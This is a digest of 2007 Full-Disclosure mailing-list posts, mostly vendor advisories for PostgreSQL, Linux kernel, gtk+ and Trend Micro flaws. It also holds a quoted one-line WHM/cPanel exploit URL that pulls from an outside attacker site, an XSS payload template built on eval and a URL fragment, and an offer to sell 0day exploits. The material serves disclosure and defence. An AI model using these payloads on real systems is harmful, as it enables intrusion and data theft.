[Full-disclosure] rPSA-2007-0025-2 postgresql postgresql-server

[rPath Update Announcements]

rPath Security Advisory: 2007-0025-2
Published: 2007-02-06
Updated:
2007-02-07 PostgreSQL 8.1.8 corrects regression
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Local User Deterministic Vulnerability
Updated Versions:
postgresql=/[EMAIL PROTECTED]:devel//1/8.1.7-0.1-1
postgresql-server=/[EMAIL PROTECTED]:devel//1/8.1.7-0.1-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0555
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0556
https://issues.rpath.com/browse/RPL-830
https://issues.rpath.com/browse/RPL-1025

Description:
Previous versions of the postgresql package are vulnerable to two
attacks in which an authenticated database user can cause the
database server process to crash (Denial of Service), and possibly
also read privileged database content (Information Exposure).

7 February 2007 Update: The security fix provided in PostgreSQL 8.1.7
introduced a functional regression: it added an overly-restrictive
check for type length in constraints and functional indexes.
PostgreSQL 8.1.8 corrects this error.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] WHM Exploit question

[Steve Ragan]

Is this one of the items patched in the recent update to WHM?
I see no info about it anywhere on the web or the Cpanel forums. Is this a
new 0-Day and if so does anyone know a security contact for Cpanel? Using
the forum, or general address are worthless at times.

Thanks

Steve


Exploit below:
name : web host manager
vendor : cpanel.net
by : s3rv3r_hack3r (ali [at] hackerz [dot] ir)
web-site : www.hackerz.ir - ali.hackerz.ir
exploit:
http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?

-- 
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.5.432 / Virus Database: 268.17.29/673 - Release Date: 2/6/2007
5:52 PM
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

[pdp (architect)]

Hei Amit,

On 2/7/07, Amit Klein <[EMAIL PROTECTED]> wrote:
> pdp (architect) wrote:
> > Amit,
> >
> > :) This is not about who did it first.
>
> Agreed. But it would be nice to receive the credit ;-)

Sorry man. I knew that you have discussed this before I would
definitely give you the credits. :)

> > BTW, your example is broken.
> > location.search does not include the fragment identifier.
> >
>
> Guilty as charged. I remember working directly with document.location
> (which includes the hostname and path) when I investigated the issue,
> then when I wrote my text I decided that a more elegant way would be
> with the ".search" property, but I failed to verify that it actually
> works. Thanks for pointing this out, and here's the formal errata:
>
> In
> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html,
> the example should be:
>
> http://target.site/vulnscript.cgi?injectme=
> eval(document.location.substr(...[fill
> in the offset here]...))#...JS payload here...
>
> Thanks to "pdp (architect)" for pointing this out.
>
> Regardns,
> -Amit
>
>
> > Cheers
> >
> > On 2/7/07, Amit Klein <[EMAIL PROTECTED]> wrote:
> >> pdp (architect) wrote:
> >> > http://www.gnucitizen.org/blog/playing-in-large
> >> >
> >> > Basically this article is about how to squeeze more data into size
> >> > restricted, unsanitized field. This technique can also be used to hide
> >> > attackers activities.
> >> >
> >> It seems that you've stumbled upon something I already disclosed:
> >> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html
> >>
> >> Sorry...
> >> -Amit
> >>
> >>
> >
> >
>
>


-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Call for Papers: IT-Incident Management and IT-Forensics 2007

[Oliver Goebel]

Dear all,

for your information.


 CALL FOR PAPERS

IMF 2007

  3rd International Conference on
   IT-Incident Management & IT-Forensics

   Stuttgart, Germany
 September 11 - 12, 2007

   http://www.imf-conference.org/
   mailto:[EMAIL PROTECTED]

---

Information technology has become crucial to almost every part of society.
IT infrastructures have become critical in the world-wide economy, the
financial sector, the health sector, the government's administration, the
military, and the educational sector.

Due to its importance the disruption or loss of IT capabilities results in
a massive reduction of operability.  Hence, IT security is continously
gaining importance.

Although security usually gets involved into the design process of IT
systems nowadays, the process of maintaining security in the operation of IT
infrastructures still lacks the appropriate attendance in most cases.
Especially the capability to manage and respond to IT security incidents and
their forensic analysis is established in the rarest cases. The quickly
rising number of security incidents worldwide makes the implementation of
incident management capabilities essential.

In order to advance the fields of IT-Incident Management and Forensics
the special interest-group Security - Intrusion Detection and Response
(SIDAR) of the German Informatics Society (GI) organises an annual
conference in co-operation with Stuttgart University's Computer
Emergency Response Team (RUS-CERT) and the Fraunhofer Institute for
Industrial Engineering (IAO), bringing together experts from throughout
the world, to discuss the state of the art in the areas of Incident
Management and  IT-Forensics (IMF). IMF promotes collaboration and
exchange of ideas between industry, academia, law-enforcement and other
government bodies.

IMF invites to submit:
--

 - Full papers of up to 20 pages, presenting novel and mature research
   results. 

 - Practice papers of up to 20 pages, describing best practices, case
   studies, lessons learned, or latest developments in technology. 

All submissions must be in English, and in either postscript or PDF
format.  Authors of accepted papers must ensure that their papers will
be presented  at the conference. Presentations should be held in
English.

Submitted full papers must not substantially overlap papers that have
been  published elsewhere or that are simultaneously submitted to a
journal or a conference with proceedings.

Details on the electronic submission procedure as well as detailed
registration information are provided on the conference Web site.

The scope of IMF 2007 is broad and includes, but is not restricted to the
following areas:

 IT-Incident Management:

- Purposes of IT-Incident Management
- Trends, Processes and Methods of IT-Incident Management
- Formats and Standardization for IT-Incident Management
- Tools for the IT-Incident Management
- Education and Training in the field of IT-Incident Management Awareness
- Determination, Detection and Evaluation of Incidents
- Procedures for Handling Incidents
- Problems and Challenges while establishing CERTs/ CSIRTs
- Sources of Information/ Information Exchange/ Communities
- Dealing with Vulnerabilities (vulnerability response)
- Current Threats
- Early Warning Systems
- Organizations (Nat. CERT-Associations, FIRST, TERENA/ TI, TF-CSIRT,
  etc)

 IT-Forensics:

- Trends and Challenges in IT-Forensics
- Methods, Processes and Applications for IT-Forensics
  (Networks, Operating Systems, Storage Media, ICT Systems etc.)
- Evidence Protection in IT-Environments
- Standardization of Evidence Protection Processes
- Data Protection and other legal implications for IT-Forensics
- Methods in Investigation
- Legal Relevance of IT-Forensics Investigations
- Tools for IT-Forensics
- IT-Forensics Readiness

Important Dates:

- May 14, 2007: Deadline for Submissions 
- June 26, 2007: Notification of acceptance or rejection
- July 17, 2007: Final paper camera ready copy due
- September 11-12, 2007: IMF 2007 Conference


General Chair:
--
  Oliver Goebel, RUS-CERT, Universitaet Stuttgart
  [EMAIL PROTECTED]

Program Chair:
--
 Sandra Frings, Fraunhofer IAO
  [EMAIL PROTECTED]

Sponsor Chair:
--
  Dirk Schadt, SPOT
  [EMAIL PROTECTED]


Program Committee
-
  see
  
http://www.gi-ev.de/fachbereiche/sicherheit/fg/sidar/imf/imf2007/committee.html

Organizing Committee:
-
  Sandra Frings, Fraunhofer IAO
  Oliver Goebel, RUS-CERT, Universitaet Stuttgart
  Detlef Guenther, Volkswagen AG
  Hardo G. Hase, IT-Consulting Hardo G. Hase
  Jens Nedon, Con

[Full-disclosure] 0day remote vuln selling SAP / Linux Kernel / PHP etc...

[toto toto]

Hi,

im selling 0day vulnerabilities and/or exploits for code execution for : SAP, 
Linux Kernel, PHP, Snort, GRSECURITY, and some other applications/tools...

Regards,


   snacker

=
Online Safety Training
Compliance based training by occupational health and safety experts. 
Affordable, interactive and proven our web-based courses are user-friendly and 
enriched with audio and visual multimedia.
http://a8-asy.a8ww.net/a8-ads/adftrclick?redirectid=d0cbe675dcd2a1feb0d8d12e5ec7cd98


-- 
Powered by Outblaze

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

[Amit Klein]

pdp (architect) wrote:
> Hei Amit,
>
> On 2/7/07, Amit Klein <[EMAIL PROTECTED]> wrote:
>> pdp (architect) wrote:
>> > Amit,
>> >
>> > :) This is not about who did it first.
>>
>> Agreed. But it would be nice to receive the credit ;-)
>
> Sorry man. I knew that you have discussed this before I would
> definitely give you the credits. :)
>

No worries, mate!

>> In
>> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html, 
>>
>> the example should be:
>>
>> http://target.site/vulnscript.cgi?injectme=
>> eval(document.location.substr(...[fill
>>  
>>
>> in the offset here]...))#...JS payload here...
>>

Of course, I meant document.location.href.substr(...), i.e.:

http://target.site/vulnscript.cgi?injectme=>eval(document.location.substr(...[fill
 
in the offset here]...))#...JS payload here...

-Amit

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

[Amit Klein]

pdp (architect) wrote:
> Amit,
>
> :) This is not about who did it first. 

Agreed. But it would be nice to receive the credit ;-)
> BTW, your example is broken.
> location.search does not include the fragment identifier.
>

Guilty as charged. I remember working directly with document.location 
(which includes the hostname and path) when I investigated the issue, 
then when I wrote my text I decided that a more elegant way would be 
with the ".search" property, but I failed to verify that it actually 
works. Thanks for pointing this out, and here's the formal errata:

In 
http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html, 
the example should be:

http://target.site/vulnscript.cgi?injectme= 
eval(document.location.substr(...[fill
 
in the offset here]...))#...JS payload here...

Thanks to "pdp (architect)" for pointing this out.  

Regardns,
-Amit


> Cheers
>
> On 2/7/07, Amit Klein <[EMAIL PROTECTED]> wrote:
>> pdp (architect) wrote:
>> > http://www.gnucitizen.org/blog/playing-in-large
>> >
>> > Basically this article is about how to squeeze more data into size
>> > restricted, unsanitized field. This technique can also be used to hide
>> > attackers activities.
>> >
>> It seems that you've stumbled upon something I already disclosed:
>> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html
>>
>> Sorry...
>> -Amit
>>
>>
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

[pdp (architect)]

Amit,

:) This is not about who did it first. BTW, your example is broken.
location.search does not include the fragment identifier.

Cheers

On 2/7/07, Amit Klein <[EMAIL PROTECTED]> wrote:
> pdp (architect) wrote:
> > http://www.gnucitizen.org/blog/playing-in-large
> >
> > Basically this article is about how to squeeze more data into size
> > restricted, unsanitized field. This technique can also be used to hide
> > attackers activities.
> >
> It seems that you've stumbled upon something I already disclosed:
> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html
>
> Sorry...
> -Amit
>
>


-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

[Amit Klein]

pdp (architect) wrote:
> http://www.gnucitizen.org/blog/playing-in-large
>
> Basically this article is about how to squeeze more data into size
> restricted, unsanitized field. This technique can also be used to hide
> attackers activities.
>
It seems that you've stumbled upon something I already disclosed:
http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html

Sorry...
-Amit

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)

[Denis Jedig]

On Wed, 31 Jan 2007 20:31:21 +0100 Gianluca Giacometti wrote:

> Moreover I already use PSExec on my windows PCs to do all the stuff.
> What I would like to do is use just the website platform and for that 
> reason I'm looking for something similar to PSExec under linux.

I believe you're looking for something to execute commands on remote
Windows machines via RPC from a linux management station. If so, winexe
from the Samba4 fork probably is what you're looking for:
http://eol.ovh.org/winexe/

-- 
Denis Jedig
syneticon networks GbR http://syneticon.net/service/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Feburary 9th Chicago 2600/DefCon312 Meeting

[Steven McGrath]

NOTE: The Meeting is the Second week this month due to restrictions
placed on the venue.

The Feburary Chicago 2600 Meeting is near! The meeting will be Friday,
Feb 9th at the Neighborhood Boys and Girls Club and will feature much
of the same usual fun that all of you have grown to expect!

[Special Meeting Information]
Chicago TOOOL Meeting will also be going on in the same building.
Omikron from TOOOL will be in attendance as well!
http://www.toool.nl/index-eng.php

[Presentation Information]
- 8:00pm - The Future of Chicago TOOOL (Omikron)
- 9.00pm - Chicago Con (DJ SubZero)
- 10:00pm - How to build a public server (Maniac) [Tentative]
- After hours - Wii, Music, Socializing, etc.

[General Information]
- Meeting Time: 7.00pm - Approx. 3-5am
- Meeting Date: Friday, Feb. 9th
- Place : 2501 W Irving Park Road, Chicago
- More Info : http://chicago2600.net

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDKSA-2007:040 ] - Updated kernel packages fix multiple vulnerabilities and bugs

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:040
 http://www.mandriva.com/security/
 ___
 
 Package : kernel
 Date: February 7, 2007
 Affected: 2007.0
 ___
 
 Problem Description:
 
 Some vulnerabilities were discovered and corrected in the Linux 2.6
 kernel:

 The isdn_ppp_ccp_reset_alloc_state function in drivers/isdn/isdn_ppp.c
 in the Linux 2.4 kernel before 2.4.34-rc4, as well as the 2.6 kernel,
 does not call the init_timer function for the ISDN PPP CCP reset state
 timer, which has unknown attack vectors and results in a system crash.
 (CVE-2006-5749)

 The listxattr syscall can corrupt user space under certain
 circumstances. The problem seems to be related to signed/unsigned
 conversion during size promotion. (CVE-2006-5753)

 The ext3fs_dirhash function in Linux kernel 2.6.x allows local users to
 cause a denial of service (crash) via an ext3 stream with malformed
 data structures. (CVE-2006-6053)

 The mincore function in the Linux kernel before 2.4.33.6, as well as
 the 2.6 kernel, does not properly lock access to user space, which has
 unspecified impact and attack vectors, possibly related to a deadlock.
 (CVE-2006-4814)

 The provided packages are patched to fix these vulnerabilities.  All
 users are encouraged to upgrade to these updated kernels immediately
 and reboot to effect the fixes.

 In addition to these security fixes, other fixes have been included
 such as:

 - Add Ralink RT2571W/RT2671 WLAN USB support (rt73 module) - Fix
 sys_msync() to report -ENOMEM as before when an unmapped area falls
 within its range, and not to overshoot (LSB regression) - Avoid disk
 sector_t overflow for >2TB ext3 filesystem - USB: workaround to fix HP
 scanners detection (#26728) - USB: unusual_devs.h for Sony floppy  
(#28378) - Add preliminary ICH9 support - Add TI sd card reader
 support - Add RT61 driver - KVM update - Fix bttv vbi offset

 To update your kernel, please follow the directions located at:

 http://www.mandriva.com/en/security/kernelupdate
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5749
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5753
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6053
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4814
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 ad34fe5a73feafdd8e69b504ebf93946  
2007.0/i586/kernel-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 d9e55a7e4f1008da15c67d1287956969  
2007.0/i586/kernel-doc-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 a9c50df979df9e3689873978436bd16f  
2007.0/i586/kernel-enterprise-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 f533abc7ea70bd3faaa9e6b28a99ab28  
2007.0/i586/kernel-legacy-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 b8ff79d0ab16056f2d254e9d679984f7  
2007.0/i586/kernel-source-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 850dbb1496700b2f93ef37e4540164cc  
2007.0/i586/kernel-source-stripped-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 6e5109401747d368e768bb7ccce1c6e3  
2007.0/i586/kernel-xen0-2.6.17.10mdv-1-1mdv2007.0.i586.rpm
 0982fc7135735d78b4805c2af67ffe19  
2007.0/i586/kernel-xenU-2.6.17.10mdv-1-1mdv2007.0.i586.rpm 
 2cfb0d90ab5aea99bacf8a721552554b  
2007.0/SRPMS/kernel-2.6.17.10mdv-1-1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 8228636d0969cdb0de42baeab61ece09  
2007.0/x86_64/kernel-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm
 935eb44188aa2784386dd8bcc93dfd78  
2007.0/x86_64/kernel-doc-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm
 9abb549acacc17385051ceebcb3331fe  
2007.0/x86_64/kernel-source-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm
 7e3667b9f28f3214669f831955ef059d  
2007.0/x86_64/kernel-source-stripped-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm
 648ae5f919580ce2df42f6a522aba7c9  
2007.0/x86_64/kernel-xen0-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm
 0ad1d27a9232f5f7cf8ae218bef5a618  
2007.0/x86_64/kernel-xenU-2.6.17.10mdv-1-1mdv2007.0.x86_64.rpm 
 2cfb0d90ab5aea99bacf8a721552554b  
2007.0/SRPMS/kernel-2.6.17.10mdv-1-1mdv2007.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 __

[Full-disclosure] [ MDKSA-2007:039 ] - Updated gtk+2.0 packages address DoS, LSB issues, several bugs

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:039
 http://www.mandriva.com/security/
 ___
 
 Package : gtk+2.0
 Date: February 7, 2007
 Affected: 2007.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 The GdkPixbufLoader function in GIMP ToolKit (GTK+) in GTK 2 (gtk2)
 allows context-dependent attackers to cause a denial of service (crash)
 via a malformed image file. (CVE-2007-0010)

 The version of libgtk+2.0 shipped with Mandriva Linux 2007 fails
 various portions of the lsb-test-desktop test suite, part of LSB 3.1
 certification testing.

 The updated packages also address the following issues:

 The Home and Desktop entries in the GTK File Chooser are not always
 visible (#26644).

 GTK+-based applications (which includes all the Mandriva Linux
 configuration tools, for example) crash (instead of falling back to the
 default theme) when an invalid icon theme is selected. (#27013)

 Additional patches from GNOME CVS have been included to address the
 following issues from the GNOME bugzilla:

 * 357132   - fix RGBA colormap issue

 * 359537,357280,359052 - fix various printer bugs

 * 357566,353736,357050,363437,379503   - fix various crashes

 * 372527   - fix fileselector bug +

 potential deadlock
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0010
 http://qa.mandriva.com/show_bug.cgi?id=26644
 http://qa.mandriva.com/show_bug.cgi?id=27013
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 6b0b76ba984d8432cca4e8d938c51844  
2007.0/i586/gtk+2.0-2.10.3-5.3mdv2007.0.i586.rpm
 015aa62677f20cf6b9f89301014ccf4d  
2007.0/i586/libgdk_pixbuf2.0_0-2.10.3-5.3mdv2007.0.i586.rpm
 8f6bc5e09ee08263633e3601d1d21069  
2007.0/i586/libgdk_pixbuf2.0_0-devel-2.10.3-5.3mdv2007.0.i586.rpm
 ef1f5a96362f5fafb982520897283919  
2007.0/i586/libgtk+-x11-2.0_0-2.10.3-5.3mdv2007.0.i586.rpm
 b96eeb174cba468e8064890668b43a56  
2007.0/i586/libgtk+2.0_0-2.10.3-5.3mdv2007.0.i586.rpm
 65f2ea83177a38b1682f4d4e5e633aea  
2007.0/i586/libgtk+2.0_0-devel-2.10.3-5.3mdv2007.0.i586.rpm 
 4f15cba4c1c1b6e37dfe9f0b5b73401c  
2007.0/SRPMS/gtk+2.0-2.10.3-5.3mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 b2470dc8cd884cf15dc47e29dbdb36de  
2007.0/x86_64/gtk+2.0-2.10.3-5.3mdv2007.0.x86_64.rpm
 11d3f44a7f55f4899984e33a07c8f722  
2007.0/x86_64/lib64gdk_pixbuf2.0_0-2.10.3-5.3mdv2007.0.x86_64.rpm
 33c26bea1a14b147f41e45467d6894e3  
2007.0/x86_64/lib64gdk_pixbuf2.0_0-devel-2.10.3-5.3mdv2007.0.x86_64.rpm
 2e3855166383646465a01bd56e1529b7  
2007.0/x86_64/lib64gtk+-x11-2.0_0-2.10.3-5.3mdv2007.0.x86_64.rpm
 4fea83682012ad4c5571e205b04dc7d1  
2007.0/x86_64/lib64gtk+2.0_0-2.10.3-5.3mdv2007.0.x86_64.rpm
 04f7f152d4e99d6c71043554e2adfa3a  
2007.0/x86_64/lib64gtk+2.0_0-devel-2.10.3-5.3mdv2007.0.x86_64.rpm 
 4f15cba4c1c1b6e37dfe9f0b5b73401c  
2007.0/SRPMS/gtk+2.0-2.10.3-5.3mdv2007.0.src.rpm

 Corporate 3.0:
 7d4501132efb62d24276152ccc23a2e0  
corporate/3.0/i586/gtk+2.0-2.2.4-10.6.C30mdk.i586.rpm
 f8828f652ae310e3de135f181e3c6f19  
corporate/3.0/i586/libgdk_pixbuf2.0_0-2.2.4-10.6.C30mdk.i586.rpm
 d99f6327006f96e8b170c20500d64985  
corporate/3.0/i586/libgdk_pixbuf2.0_0-devel-2.2.4-10.6.C30mdk.i586.rpm
 f2a98b2036167b780e87e2cd0d105983  
corporate/3.0/i586/libgtk+-linuxfb-2.0_0-2.2.4-10.6.C30mdk.i586.rpm
 e28fbfc9664db29c37517ca8957647c0  
corporate/3.0/i586/libgtk+-linuxfb-2.0_0-devel-2.2.4-10.6.C30mdk.i586.rpm
 8b80464f88674e0bf5f7ed06efafcb72  
corporate/3.0/i586/libgtk+-x11-2.0_0-2.2.4-10.6.C30mdk.i586.rpm
 b154589c077c790b1f71379194ed84a6  
corporate/3.0/i586/libgtk+2.0_0-2.2.4-10.6.C30mdk.i586.rpm
 819ee9fa563420c37d7cae612c3a6bec  
corporate/3.0/i586/libgtk+2.0_0-devel-2.2.4-10.6.C30mdk.i586.rpm 
 dbe156cf5e976fc744b635eab3e4  
corporate/3.0/SRPMS/gtk+2.0-2.2.4-10.6.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 bed655ae3c4d6635e87488eefebe7e12  
corporate/3.0/x86_64/gtk+2.0-2.2.4-10.6.C30mdk.x86_64.rpm
 369daff90b35687abae6ad34cf513af3  
corporate/3.0/x86_64/lib64gdk_pixbuf2.0_0-2.2.4-10.6.C30mdk.x86_64.rpm
 3675f57dd8e738cd1674db6518cd7c0d  
corporate/3.0/x86_64/lib64gdk_pixbuf2.0_0-devel-2.2.4-10.6.C30mdk.x86_64.rpm
 28dfaebd73dacca8fc2497caeac619a5  
corporate/3.0/x86_64/lib64gtk+-linuxfb-2.0_0-2.2.4-10.6.C30mdk.x86_64.rpm
 22b487085911cce6fa8a5f2d6557009b  
corporate/3.0/x86_64/lib64gtk+-linuxfb-2.0_0-devel-2.2.4-10.6.C30mdk.x86_64.rpm
 e0cf2152fc480ab73e4236de7a186d23  
corporate/3.0/x86_64/lib64gtk+-x11-2.0_0-2.2.4-10.6.C30mdk.x86_64.rpm
 512547fd9c3efca43b7c000fdbaedec3  
corporate/3.0/x86_64/lib64gtk+2.0_0-2.2.4-10.6.C30mdk

[Full-disclosure] iDefense Security Advisory 02.07.07: Trend Micro AntiVirus UPX Parsing Kernel Buffer Overflow Vulnerability

[iDefense Labs]

Trend Micro AntiVirus UPX Parsing Kernel Buffer Overflow Vulnerability

iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007

I. BACKGROUND

The Trend Micro AntiVirus scan engine provides anti-virus capabilities to
desktop, server and gateway systems. The engine is licensed to several of
Trend Micro's OEM partners. More information is available on Trend Micro's
web site at the following URL.

http://www.trendmicro.com/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability within Trend Micro's
AntiVirus engine could allow an attacker to crash the scan engine or
execute arbitrary code.

This vulnerability is caused by improper input validation when scanning
specially crafted malformed UPX compressed executables. Memory corruption
could occur leading to a invalid memory access or a potentially
exploitable condition.

III. ANALYSIS

Exploitation allows attackers to crash the scan engine or execute arbitrary
code.

This vulnerability could be used to gain unauthorized access to machines
through common protocols, e.g. SMTP, HTTP, FTP. No authentication is
required for an attacker to leverage this vulnerability.

Under Windows, the scan engine runs in kernel context. Under Linux, the
scan engine runs as a daemon with superuser privileges. As such, an
attacker can take complete control of the affected system if successful
code execution is attained.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in our
vulnerability lab. The configurations at verification time were as
follows:

 * Trend Micro's PC-Cillin Internet Security 2007
 * VsapiNI.sys (scan engine) version 3.320.0.1003

 * ServerProtect for Linux v2.5 on RHEL 4.x
 * vsapiapp version 8.310

Any implementations based on Trend Micro's AntiVirus scan engine are
likely vulnerable in their default configuration.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE

"To address this vulnerability, Trend Micro recommends customers to update
to Virus Pattern File 4.245.00 or higher."

For more information, consult the Trend Micro Knowledge Base article at
the link shown below.

http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034289

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

01/17/2007  Initial vendor notification
01/19/2007  Initial vendor response
02/07/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of
iDefense. If you wish to reprint the whole or any part of this alert in
any other medium other than electronically, please e-mail
[EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, this
information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 02.07.07: Trend Micro TmComm Local Privilege Escalation Vulnerability

[iDefense Labs]

Trend Micro TmComm Local Privilege Escalation Vulnerability

iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007

I. BACKGROUND

The Trend Micro AntiVirus scan engine is widely relied upon to provide
AntiVirus capabilities to desktop, server, and gateway systems. The engine
is licensed to several of Trend Micro's OEM partners. More information is
available on Trend Micro's web site at the following URL.

http://www.trendmicro.com/

II. DESCRIPTION

Local exploitation of an input validation vulnerability within version
1.5.0.1052 of TmComm.sys as included with Trend Micro's AntiVirus engine
could allow an attacker execute arbitrary code in kernel context.

This vulnerability specifically exists due to insecure permissions on the
\\.\TmComm DOS device interface. The permissions on this device allows
"Everyone" write access. This could allow a locally logged in user to
access functionality via IOCTLs which was designed for privileged use
only.

Additionally, the IOCTL handlers for this DOS device interface do not
validate addresses passed to them. As such, it is possible to overwrite
arbitrary memory or execute attacker-supplied code in the context of the
kernel (RING 0).

III. ANALYSIS

Exploitation allows an attacker to elevate privileges by overwriting
arbitrary system memory or executing code within kernel context.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in our
vulnerability lab. The configuration at verification time was as follows:

 * Trend Micro's PC-Cillin Internet Security 2007
 * TmComm.sys version 1.5.0.1052
 * VsapiNI.sys (scan engine) version 3.320.0.1003

All products using Trend Micro's scan engine should be considered
vulnerable.

V. WORKAROUND

Removing write permissions for "Everyone" appears to prevent access to the
vulnerable code. iDefense confirmed that the virus scanning engine was
still able to detect viruses. Although no side effects were witnessed in
Lab tests, normal functionality may be hindered.

VI. VENDOR RESPONSE

"To address this vulnerability, Trend Micro recommends to customers to
update their Anti-Rootkit Common Module to version 1.600-1052.

Products that are set to Automatic Update will be updated immediately.

Manual Updating can also be performed by using the product's "Update
Now" function."

More information is available in Trend Micro's knowledge base at the link
shown below.

http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034432&id=EN-1034432

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

01/17/2007  Initial vendor notification
01/19/2007  Initial vendor response
02/07/2007  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Ruben Santamarta of
reversemode.com.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of
iDefense. If you wish to reprint the whole or any part of this alert in
any other medium other than electronically, please e-mail
[EMAIL PROTECTED] for permission.

